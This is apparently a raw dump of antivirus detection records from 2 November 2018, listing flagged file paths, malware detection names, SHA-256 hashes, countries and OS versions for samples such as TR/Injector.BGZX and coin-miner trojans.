  Row(detection=Row(filename='avscan-20181102-184522-0499bd94', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_23c10ab5\\AVSCAN-20181102-173208-165F3A81\\AVSCAN-20181102-184522-0499BD94', filesize=840000, name='TR/Miner.OA.#M1.#R1'), hash='0978fcc7db3a27e180fca68b33d99c6bbe8173054f1cd0ebfd0fe0be35667656', metadata=Row(cmdline=None, country='GE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:45:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:41:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:37:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa0.750\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa0.750\\Setup.exe', parentsize=1551000, timestamp='2018-11-02T07:45:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:50:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='df28d009060ab06fb604da639f1e0ef4c0959eb0', filepath='\\\\?\\c:\\users\\X\\appdata\\local\\temp\\2\\df28d009060ab06fb604da639f1e0ef4c0959eb0', filesize=384000, name='HEUR/AGEN.1029347.#M1.#R1'), hash='3f834e1fd7120e4e7d6a03be62f5dc427a2d1494119534b5286762623062c3a8', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T22:20:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:47:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='0ba07dcc666c77ab9c3af399c1d46d1651616c4fdcea0db4efa33e7088e57942', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\0BA07DCC666C77AB9C3AF399C1D46D1651616C4FDCEA0DB4EFA33E7088E57942', filesize=2176000, name='HEUR/AGEN.1034483.#M1.#R1'), hash='0ba07dcc666c77ab9c3af399c1d46d1651616c4fdcea0db4efa33e7088e57942', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-38.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-4.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-5.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\...\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-9.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-37.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T10:51:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='help.exe', filepath='I:\\ألعاب\\Games 1\\Dd249\\res\\help\\help.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='24399e11e21162ea957a4849ac268a8224d22127c1f67fcecffc9dd2d2ef515d', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:38:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:41:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:36:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181103-005852-cfb22bfc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8d24877d\\AVSCAN-20181103-005613-C00024DA\\AVSCAN-20181103-005852-CFB22BFC', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='AT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T23:58:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='flashupdate (1).exe', filepath='C:\\Users\\X\\Documents\\Downloads\\flashupdate (1).exe', filesize=1536000, name='TR/CoinMiner.CK.#M1.#R1'), hash='39cee19d7a3a27e18697f46c37fdd5277c4b22524aa0784de20a211cac399800', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2613248, timestamp='2018-11-02T17:26:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='1173153.exe', filepath='\\\\?\\C:\\Program Files (x86)\\Super\\1173153.exe', filesize=1024000, name='Adware/CsdiMonetize.zfkkq.#M1.#R1'), hash='3d883000c358c04415b50d9c46e276ecc714e168d2ba831cf9b61b9b0d214bfe', metadata=Row(cmdline=None, country='BD', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T18:32:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='a0121722.exe', filepath='\\?\\H:\\System Volume Information\\_restore{FD8CA95C-615B-4BD2-B142-4564B27DDB35}\\RP2\\A0121722.EXE', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='08f001bff3c666a6f70c117695c9e6c1d7d58659e5e5c351f6c7ca204eca8718', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:46:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-211059-c5998f2c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2eb1b43c\\AVSCAN-20181102-210813-AE62A200\\AVSCAN-20181102-211059-C5998F2C', filesize=2732000, name='ADWARE/PullUpdate.Gen7.#M1.#R1'), hash='36737fdec959599bcadd83a1e629a595b32974d2de7b93fc56e4a8c844995aff', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-02T20:11:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered nolor', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered nolor', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='2f6ebf21da79db0779ace05500bac9a7b4cc61749d8f935cd23fbfcd87822827', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-02T07:14:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:24:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:30:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='pdf tender document.tar --> j111.exe', filepath='pdf TENDER DOCUMENT.tar --> J111.exe', filesize=1152000, name='DR/Delphi.6abe65.#M1.#R1'), hash='6abe6528568d3820b27e309c4369b24bf0f1dc41bf8c3774d9c2526104f6a5ff', metadata=Row(cmdline=None, country='DE', os_name='Linux', os_vmajor='3', os_vminor='14', parentproc=None, parentsize=None, timestamp='2018-11-02T16:16:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054619-979378b0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054619-979378B0', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:46:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053148-908f2165', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053148-908F2165', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:31:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='acdseecommanderultimate8.exe', filepath='C:\\Program Files\\ACD Systems\\ACDSee Ultimate\\8.0\\ACDSeeCommanderUltimate8.exe', filesize=960000, name='HEUR/APC.#M1.#R1'), hash='5bf062b08aeec88d8a2a4d4026382f3775dc6ed167ca59f69626254cd0193106', metadata=Row(cmdline=None, country='RO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\ACD Systems\\ACDSee Ultimate\\8.0\\ACDSeeCommanderUltimate8.exe', parentsize=960000, timestamp='2018-11-02T17:31:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051546-53204da1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051546-53204DA1', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:15:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-145923-6e7b80c3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c6879e40\\AVSCAN-20181102-145837-691830DF\\AVSCAN-20181102-145923-6E7B80C3', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T07:59:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052150-2c1f418c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052150-2C1F418C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:21:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060133-b89e41d0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060133-B89E41D0', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:01:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055204-65329376', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055204-65329376', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:52:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061410-7be73b24', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061410-7BE73B24', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:14:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061954-4876b826', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061954-4876B826', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:19:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054656-ad9ebe8d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054656-AD9EBE8D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:46:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061449-92b5409b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061449-92B5409B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:14:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055001-1c1495b0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055001-1C1495B0', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:50:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-192149-aa153e6e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_847d94ad\\AVSCAN-20181102-192119-A6441967\\AVSCAN-20181102-192149-AA153E6E', filesize=64000, name='TR/Agent.micws.#M1.#R1'), hash='604898f36af3c8a3ba421d9bf9b5c4156ac28127357a809aca38611edb5d6db9', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T18:21:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='setup_winthruster_2016.exe', filepath='C:\\Users\\X\\Downloads\\Setup_WinThruster_2016.exe', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-02T17:11:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061400-75aa005e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061400-75AA005E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:13:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='bk01-toc.htm', filepath='E:\\New Programms\\Samsung driver-\\MANUAL\\Samsung SCX-483x 5x3x Series\\arabic\\advanced\\bk01-toc.htm', filesize=224000, name='VBS/Ramnit.abcd.#M1.#R1'), hash='6f3101dccfa7d2dd965d59e08251faafd423d5f65713cfed53eea69bb7e4788f', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T12:49:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='政协桥目录.xls', filepath='F:\\参考\\工程参考\\0-莆田招投标发布图纸\\政协桥施工图图纸\\3桥\\政协桥目录.xls', filesize=128000, name='HEUR/Mailcab.C.#M1.#R1'), hash='4ed1b248de01c8456d223f7c02d498a2e0cf8970abf73e7ce014667f0f5c1c87', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T03:00:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055203-6491b45c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055203-6491B45C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:52:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-175324-09ae0c72', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_ce7434cb\\AVSCAN-20181102-175227-038C0A01\\AVSCAN-20181102-175324-09AE0C72', filesize=4736000, name='TR/Agent.87443.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T11:19:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053120-7fb54f63', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053120-7FB54F63', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:31:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052946-47c3612a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052946-47C3612A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:29:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053548-1f68de7b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053548-1F68DE7B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:35:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061031-f92b1bee', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061031-F92B1BEE', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:10:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055334-9b2381c6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055334-9B2381C6', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:53:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052326-658399df', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052326-658399DF', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:23:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052436-8eb753cb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052436-8EB753CB', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:24:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052609-c69f49e9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052609-C69F49E9', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:26:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053814-765f940e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053814-765F940E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:38:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052359-78aa44d2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052359-78AA44D2', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:23:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054737-c6187ea7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054737-C6187EA7', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:47:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050918-6be29123', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050918-6BE29123', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:09:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051015-8dbd15ef', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051015-8DBD15EF', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:10:14Z'), dt=datetime.date(2018, 11, 2)),
